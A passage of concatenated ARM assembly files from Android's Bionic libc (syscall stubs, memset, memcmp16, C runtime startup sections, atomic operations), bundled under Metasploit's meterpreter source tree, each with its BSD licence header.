* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.global __get_sp
.type __get_sp, %function
__get_sp:
mov r0, sp
bx lr
|
OpenWireSec/metasploit | 2,063 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/tkill.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
/* unlike our auto-generated syscall stubs, this code saves lr
on the stack, as well as a few other registers. this makes
our stack unwinder happy, when we generate debug stack
traces after the C library or other parts of the system
abort due to a fatal runtime error (e.g. detection
of a corrupted malloc heap).
*/
#include <sys/linux-syscalls.h>
#ifndef __NR_tkill
#define __NR_tkill 238
#endif
.text
.type tkill, #function
.globl tkill
.align 4
tkill:
stmfd sp!, {r4-r7, ip, lr}
ldr r7, =__NR_tkill
swi #0
ldmfd sp!, {r4-r7, ip, lr}
movs r0, r0
bxpl lr
b __set_syscall_errno
|
OpenWireSec/metasploit | 7,302 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/memcmp16.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/cpu-features.h>
.text
.global __memcmp16
.type __memcmp16, %function
.align 4
/*
* Optimized memcmp16() for ARM9.
* This would not be optimal on XScale or ARM11, where more prefetching
* and use of PLD will be needed.
* The 2 major optimzations here are
* (1) The main loop compares 16 bytes at a time
* (2) The loads are scheduled in a way they won't stall
*/
__memcmp16:
.fnstart
PLD (r0, #0)
PLD (r1, #0)
/* take of the case where length is nul or the buffers are the same */
cmp r0, r1
cmpne r2, #0
moveq r0, #0
bxeq lr
/* since r0 hold the result, move the first source
* pointer somewhere else
*/
mov r3, r0
/* make sure we have at least 12 words, this simplify things below
* and avoid some overhead for small blocks
*/
cmp r2, #12
bpl 0f
/* small blocks (less then 12 words) */
PLD (r0, #32)
PLD (r1, #32)
1: ldrh r0, [r3], #2
ldrh ip, [r1], #2
subs r0, r0, ip
bxne lr
subs r2, r2, #1
bne 1b
bx lr
.save {r4, lr}
/* save registers */
0: stmfd sp!, {r4, lr}
/* align first pointer to word boundary */
tst r3, #2
beq 0f
ldrh r0, [r3], #2
ldrh ip, [r1], #2
sub r2, r2, #1
subs r0, r0, ip
/* restore registers and return */
ldmnefd sp!, {r4, lr}
bxne lr
.fnend
0: /* here the first pointer is aligned, and we have at least 3 words
* to process.
*/
/* see if the pointers are congruent */
eor r0, r3, r1
ands r0, r0, #2
bne 5f
/* congruent case, 16 half-words per iteration
* We need to make sure there are at least 16+2 words left
* because we effectively read ahead one long word, and we could
* read past the buffer (and segfault) if we're not careful.
*/
ldr ip, [r1]
subs r2, r2, #(16 + 2)
bmi 1f
0:
PLD (r3, #64)
PLD (r1, #64)
ldr r0, [r3], #4
ldr lr, [r1, #4]!
eors r0, r0, ip
ldreq r0, [r3], #4
ldreq ip, [r1, #4]!
eoreqs r0, r0, lr
ldreq r0, [r3], #4
ldreq lr, [r1, #4]!
eoreqs r0, r0, ip
ldreq r0, [r3], #4
ldreq ip, [r1, #4]!
eoreqs r0, r0, lr
ldreq r0, [r3], #4
ldreq lr, [r1, #4]!
eoreqs r0, r0, ip
ldreq r0, [r3], #4
ldreq ip, [r1, #4]!
eoreqs r0, r0, lr
ldreq r0, [r3], #4
ldreq lr, [r1, #4]!
eoreqs r0, r0, ip
ldreq r0, [r3], #4
ldreq ip, [r1, #4]!
eoreqs r0, r0, lr
bne 2f
subs r2, r2, #16
bhs 0b
/* do we have at least 2 words left? */
1: adds r2, r2, #(16 - 2 + 2)
bmi 4f
/* finish off 2 words at a time */
3: ldr r0, [r3], #4
ldr ip, [r1], #4
eors r0, r0, ip
bne 2f
subs r2, r2, #2
bhs 3b
/* are we done? */
4: adds r2, r2, #2
bne 8f
/* restore registers and return */
mov r0, #0
ldmfd sp!, {r4, lr}
bx lr
2: /* the last 2 words are different, restart them */
ldrh r0, [r3, #-4]
ldrh ip, [r1, #-4]
subs r0, r0, ip
ldreqh r0, [r3, #-2]
ldreqh ip, [r1, #-2]
subeqs r0, r0, ip
/* restore registers and return */
ldmfd sp!, {r4, lr}
bx lr
/* process the last few words */
8: ldrh r0, [r3], #2
ldrh ip, [r1], #2
subs r0, r0, ip
bne 9f
subs r2, r2, #1
bne 8b
9: /* restore registers and return */
ldmfd sp!, {r4, lr}
bx lr
5: /*************** non-congruent case ***************/
/* align the unaligned pointer */
bic r1, r1, #3
ldr lr, [r1], #4
sub r2, r2, #8
6:
PLD (r3, #64)
PLD (r1, #64)
mov ip, lr, lsr #16
ldr lr, [r1], #4
ldr r0, [r3], #4
orr ip, ip, lr, lsl #16
eors r0, r0, ip
moveq ip, lr, lsr #16
ldreq lr, [r1], #4
ldreq r0, [r3], #4
orreq ip, ip, lr, lsl #16
eoreqs r0, r0, ip
moveq ip, lr, lsr #16
ldreq lr, [r1], #4
ldreq r0, [r3], #4
orreq ip, ip, lr, lsl #16
eoreqs r0, r0, ip
moveq ip, lr, lsr #16
ldreq lr, [r1], #4
ldreq r0, [r3], #4
orreq ip, ip, lr, lsl #16
eoreqs r0, r0, ip
bne 7f
subs r2, r2, #8
bhs 6b
sub r1, r1, #2
/* are we done? */
adds r2, r2, #8
moveq r0, #0
beq 9b
/* finish off the remaining bytes */
b 8b
7: /* fix up the 2 pointers and fallthrough... */
sub r1, r1, #2
b 2b
|
OpenWireSec/metasploit | 1,550 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/crtend.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.section .preinit_array, "aw"
.long 0
.section .init_array, "aw"
.long 0
.section .fini_array, "aw"
.long 0
.section .ctors, "aw"
.long 0
|
OpenWireSec/metasploit | 1,576 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/crtend_so.S | /*
* Copyright (C) 2010 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
/* This is the same than crtend.S except that a shared library
* cannot have a .preinit_array
*/
.section .init_array, "aw"
.long 0
.section .fini_array, "aw"
.long 0
|
OpenWireSec/metasploit | 2,050 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/_exit_with_stack_teardown.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <asm/unistd.h>
.text
.type _exit_with_stack_teardown, #function
.globl _exit_with_stack_teardown
.align 4
@ void _exit_with_stack_teardown(void * stackBase, int stackSize, int retCode)
_exit_with_stack_teardown:
#if __ARM_EABI__
mov lr, r2
ldr r7, =__NR_munmap
swi #0 @ the stack is destroyed by this call
mov r0, lr
ldr r7, =__NR_exit
swi #0
#else
mov lr, r2
swi # __NR_munmap @ the stack is destroyed by this call
mov r0, lr
swi # __NR_exit
#endif
@ exit() should never return, cause a crash if it does
mov r0, #0
ldr r0, [r0]
|
OpenWireSec/metasploit | 2,643 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/crtbegin_dynamic.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.text
.align 4
.type _start,#function
.globl _start
# this is the small startup code that is first run when
# any executable that is dynamically-linked with Bionic
# runs.
#
# it's purpose is to call __libc_init with appropriate
# arguments, which are:
#
# - the address of the raw data block setup by the Linux
# kernel ELF loader
#
# - address of an "onexit" function, not used on any
# platform supported by Bionic
#
# - address of the "main" function of the program. We
# can't hard-code it in the adr pseudo instruction
# so we use a tiny trampoline that will get relocated
# by the dynamic linker before this code runs
#
# - address of the constructor list
#
_start:
mov r0, sp
mov r1, #0
adr r2, 0f
adr r3, 1f
b __libc_init
0: b main
1: .long __PREINIT_ARRAY__
.long __INIT_ARRAY__
.long __FINI_ARRAY__
.long __CTOR_LIST__
.section .preinit_array, "aw"
.globl __PREINIT_ARRAY__
__PREINIT_ARRAY__:
.long -1
.section .init_array, "aw"
.globl __INIT_ARRAY__
__INIT_ARRAY__:
.long -1
.section .fini_array, "aw"
.globl __FINI_ARRAY__
__FINI_ARRAY__:
.long -1
.section .ctors, "aw"
.globl __CTOR_LIST__
__CTOR_LIST__:
.long -1
#include "__dso_handle.S"
|
OpenWireSec/metasploit | 1,472 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/__get_pc.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.global __get_pc
.type __get_pc, %function
__get_pc:
mov r0, pc
bx lr
|
OpenWireSec/metasploit | 2,093 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/syscall.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <sys/linux-syscalls.h>
.text
.align 4
.type syscall,#function
.globl syscall
.text
.align
#if __ARM_EABI__
syscall:
mov ip, sp
stmfd sp!, {r4, r5, r6, r7}
mov r7, r0
mov r0, r1
mov r1, r2
mov r2, r3
ldmfd ip, {r3, r4, r5, r6}
swi #0
ldmfd sp!, {r4, r5, r6, r7}
movs r0, r0
bxpl lr
b __set_syscall_errno
#else
#ifndef __NR_syscall
#define __NR_syscall 113
#endif
syscall:
stmfd sp!, {r4, r5, lr}
ldr r4, [sp, #12]
ldr r5, [sp, #16]
swi __NR_syscall
ldmfd sp!, {r4, r5, lr}
movs r0, r0
bxpl lr
b __set_syscall_errno
#endif
|
OpenWireSec/metasploit | 3,435 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/memset.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.text
.global memset
.type memset, %function
.global bzero
.type bzero, %function
.align
/*
* Optimized memset() for ARM.
*
* memset() returns its first argument.
*/
bzero:
mov r2, r1
mov r1, #0
memset:
/* compute the offset to align the destination
* offset = (4-(src&3))&3 = -src & 3
*/
.fnstart
.save {r0, r4-r7, lr}
stmfd sp!, {r0, r4-r7, lr}
rsb r3, r0, #0
ands r3, r3, #3
cmp r3, r2
movhi r3, r2
/* splat r1 */
mov r1, r1, lsl #24
orr r1, r1, r1, lsr #8
orr r1, r1, r1, lsr #16
movs r12, r3, lsl #31
strcsb r1, [r0], #1 /* can't use strh (alignment unknown) */
strcsb r1, [r0], #1
strmib r1, [r0], #1
subs r2, r2, r3
ldmlsfd sp!, {r0, r4-r7, lr} /* return */
bxls lr
/* align the destination to a cache-line */
mov r12, r1
mov lr, r1
mov r4, r1
mov r5, r1
mov r6, r1
mov r7, r1
rsb r3, r0, #0
ands r3, r3, #0x1C
beq 3f
cmp r3, r2
andhi r3, r2, #0x1C
sub r2, r2, r3
/* conditionnaly writes 0 to 7 words (length in r3) */
movs r3, r3, lsl #28
stmcsia r0!, {r1, lr}
stmcsia r0!, {r1, lr}
stmmiia r0!, {r1, lr}
movs r3, r3, lsl #2
strcs r1, [r0], #4
3:
subs r2, r2, #32
mov r3, r1
bmi 2f
1: subs r2, r2, #32
stmia r0!, {r1,r3,r4,r5,r6,r7,r12,lr}
bhs 1b
2: add r2, r2, #32
/* conditionnaly stores 0 to 31 bytes */
movs r2, r2, lsl #28
stmcsia r0!, {r1,r3,r12,lr}
stmmiia r0!, {r1, lr}
movs r2, r2, lsl #2
strcs r1, [r0], #4
strmih r1, [r0], #2
movs r2, r2, lsl #2
strcsb r1, [r0]
ldmfd sp!, {r0, r4-r7, lr}
bx lr
.fnend
|
OpenWireSec/metasploit | 6,225 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/atomics_arm.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <sys/linux-syscalls.h>
.global __atomic_cmpxchg
.type __atomic_cmpxchg, %function
.global __atomic_swap
.type __atomic_swap, %function
.global __atomic_dec
.type __atomic_dec, %function
.global __atomic_inc
.type __atomic_inc, %function
#define FUTEX_WAIT 0
#define FUTEX_WAKE 1
#if 1
.equ kernel_cmpxchg, 0xFFFF0FC0
.equ kernel_atomic_base, 0xFFFF0FFF
__atomic_dec:
.fnstart
.save {r4, lr}
stmdb sp!, {r4, lr}
mov r2, r0
1: @ atomic_dec
ldr r0, [r2]
mov r3, #kernel_atomic_base
add lr, pc, #4
sub r1, r0, #1
add pc, r3, #(kernel_cmpxchg - kernel_atomic_base)
bcc 1b
add r0, r1, #1
ldmia sp!, {r4, lr}
bx lr
.fnend
__atomic_inc:
.fnstart
.save {r4, lr}
stmdb sp!, {r4, lr}
mov r2, r0
1: @ atomic_inc
ldr r0, [r2]
mov r3, #kernel_atomic_base
add lr, pc, #4
add r1, r0, #1
add pc, r3, #(kernel_cmpxchg - kernel_atomic_base)
bcc 1b
sub r0, r1, #1
ldmia sp!, {r4, lr}
bx lr
.fnend
/* r0(old) r1(new) r2(addr) -> r0(zero_if_succeeded) */
__atomic_cmpxchg:
.fnstart
.save {r4, lr}
stmdb sp!, {r4, lr}
mov r4, r0 /* r4 = save oldvalue */
1: @ atomic_cmpxchg
mov r3, #kernel_atomic_base
add lr, pc, #4
mov r0, r4 /* r0 = oldvalue */
add pc, r3, #(kernel_cmpxchg - kernel_atomic_base)
bcs 2f /* swap was made. we're good, return. */
ldr r3, [r2] /* swap not made, see if it's because *ptr!=oldvalue */
cmp r3, r4
beq 1b
2: @ atomic_cmpxchg
ldmia sp!, {r4, lr}
bx lr
.fnend
#else
#define KUSER_CMPXCHG 0xffffffc0
/* r0(old) r1(new) r2(addr) -> r0(zero_if_succeeded) */
__atomic_cmpxchg:
stmdb sp!, {r4, lr}
mov r4, r0 /* r4 = save oldvalue */
1: add lr, pc, #4
mov r0, r4 /* r0 = oldvalue */
mov pc, #KUSER_CMPXCHG
bcs 2f /* swap was made. we're good, return. */
ldr r3, [r2] /* swap not made, see if it's because *ptr!=oldvalue */
cmp r3, r4
beq 1b
2: ldmia sp!, {r4, lr}
bx lr
/* r0(addr) -> r0(old) */
__atomic_dec:
stmdb sp!, {r4, lr}
mov r2, r0 /* address */
1: ldr r0, [r2] /* oldvalue */
add lr, pc, #4
sub r1, r0, #1 /* newvalue = oldvalue - 1 */
mov pc, #KUSER_CMPXCHG
bcc 1b /* no swap, try again until we get it right */
mov r0, ip /* swapped, return the old value */
ldmia sp!, {r4, lr}
bx lr
/* r0(addr) -> r0(old) */
__atomic_inc:
stmdb sp!, {r4, lr}
mov r2, r0 /* address */
1: ldr r0, [r2] /* oldvalue */
add lr, pc, #4
add r1, r0, #1 /* newvalue = oldvalue + 1 */
mov pc, #KUSER_CMPXCHG
bcc 1b /* no swap, try again until we get it right */
mov r0, ip /* swapped, return the old value */
ldmia sp!, {r4, lr}
bx lr
#endif
/* r0(new) r1(addr) -> r0(old) */
/* replaced swp instruction with ldrex/strex for ARMv6 & ARMv7 */
__atomic_swap:
#if defined (_ARM_HAVE_LDREX_STREX)
1: ldrex r2, [r1]
strex r3, r0, [r1]
teq r3, #0
bne 1b
mov r0, r2
mcr p15, 0, r0, c7, c10, 5 /* or, use dmb */
#else
swp r0, r0, [r1]
#endif
bx lr
/* __futex_wait(*ftx, val, *timespec) */
/* __futex_wake(*ftx, counter) */
/* __futex_syscall3(*ftx, op, val) */
/* __futex_syscall4(*ftx, op, val, *timespec) */
.global __futex_wait
.type __futex_wait, %function
.global __futex_wake
.type __futex_wake, %function
.global __futex_syscall3
.type __futex_syscall3, %function
.global __futex_syscall4
